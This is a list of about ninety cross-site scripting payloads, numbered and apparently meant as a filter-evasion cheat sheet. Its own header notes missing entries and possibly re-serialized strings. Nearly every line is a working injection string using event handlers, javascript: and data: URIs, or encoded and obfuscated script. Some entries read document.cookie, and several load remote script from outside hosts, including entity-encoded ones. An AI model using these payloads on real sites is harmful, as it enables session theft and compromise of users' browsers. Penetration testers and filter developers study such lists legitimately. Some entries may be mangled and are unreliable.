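One Hundred Cross-site Scripting Payloads
Note: this copy of the list is incomplete: entry 1 and entries 80–82, 86–87 and 91 are missing. Several entries from 83 onward carry stray `=""` attributes and look as if an HTML parser re-serialized them, so they may not match the strings as originally published. Tags in braces such as {Opera} or {IE7} presumably name the browser an entry was written for.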
2) <svg><style>{font-family:'<iframe/onload=confirm(1)>'
3) <input/onmouseover="javaSCRIPT:confirm(1)"
4) <svg><script >alert(1) {Opera}
5) <img/src=`` onerror=this.onerror=confirm(1)
6) <form>
<isindex formaction="javascript:confirm(1)"
7) <img src=``
 onerror=alert(1)

8) <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
9) <script 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
10) <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
11) <script /**/>/**/alert(1)/**/</script /**/
12) "><h1/onmouseover='\u0061lert(1)'>
13) <iframe/src="data:text/html,<svg onload=alert(1)>">
14) <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
15) <svg><script xlink:href=data:,window.open('https://www.google.com/')></script
16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
18) <iframe src=javascript:alert(document.location)>
19) <form>
<a href="javascript:\u0061lert(1)">X
20) </script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'>
21) <img/	  src=`~` onerror=prompt(1)>
22) <form>
<iframe 	  src="javascript:alert(1)" 	;>
23) <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
24) http://www.google<script .com>alert(document.location)</script
25) <a href=[�]"� onmouseover=prompt(1)//">XYZ</a
26) <img/src=@  onerror = prompt('1')
27) <style/onload=prompt('XSS')
28) <script ^__^>alert(String.fromCharCode(49))</script ^__^
29) </style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
30) �</form>
<input type="date" onfocus="alert(1)">
31) <form>
<textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
33) <iframe srcdoc='<body onload=prompt(1)>'>
34) <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
35) <script ~~~>alert(0%0)</script ~~~>
36) <style/onload=<!--	> alert (1)>
37) <///style///><span %2F onmousemove='alert(1)'>SPAN
38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
39) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
40) <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
41) <marquee onstart='javascript:alert(1)'>^__^
42) <div/style="width:expression(confirm(1))">X</div>
{IE7}
43) <iframe// src=javaSCRIPT:alert(1)
44) //<form/action=javascript:alert(document.cookie)><input/type='submit'>//
45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
47) </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
48) <a/href="javascript: javascript:prompt(1)"><input type="X">
49) </plaintext\></|\><plaintext/onmouseover=prompt(1)
50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
51) <a href="javascript:\u0061le%72t(1)"><button>
52) <div onmouseover='alert(1)'>
DIV</div>
53) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
54) <a href="jAvAsCrIpT:alert(1)">X</a>
55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
57) <var onmouseover="prompt(1)">On Mouse Over</var>
58) <a href=javascript:alert(document.cookie)>Click Here</a>
59) <img src="/" =_=" title="onerror='prompt(1)'">
60) <%<!--'%><script>alert(1);</script -->
61) <script src="data:text/javascript,alert(1)"></script>
62) <iframe/src \/\/onload = prompt(1)
63) <iframe/onreadystatechange=alert(1)
64) <svg/onload=alert(1)
65) <input value=<><iframe/src=javascript:confirm(1)
66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
67) http://www.<script>alert(1)</script .com
68) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
69) <svg><script>alert(1)
70) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
71) <img src=`xx:xx`onerror=alert(1)>
72) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
73) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
74) <math><a xlink:href="//jsfiddle.net/t846h/">click
75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
76) <svg contentScriptType=text/vbs><script>MsgBox+1
77) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script></svg>
83) <script>+-+-1-+-+alert(1)</script>
84) <body onload="<!-->&#10alert(1)">
85) <script itworksinallbrowsers="">/*<script* */alert(1)</script><script>//
confirm(1);</script>
88) <svg><script onlypossibleinopera:-=""> alert(1)
89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
90) <script x> alert(1) </script> style="x:">
92) <-- img="" onerror="alert(1)" src="`"> --!>
93)<script src="&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)"></script>
94) <div onclick="alert(1)" onmouseover="prompt(1)" style="height: 100%; left: 0; position: absolute; top: 0; width: 100%;">
x</div>
</--></svg></body>
95) "><img https:="" onerror="window.open(" src="x" www.google.com="" />
96) <br />
<form>
<button formaction="javascript:alert(1)">CLICKME
97) <math><a href="https://www.blogger.com/null" xlink:href="//jsfiddle.net/t846h/">click
98) <object data="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+"></object>
99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
100) <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a></a></math></button></form>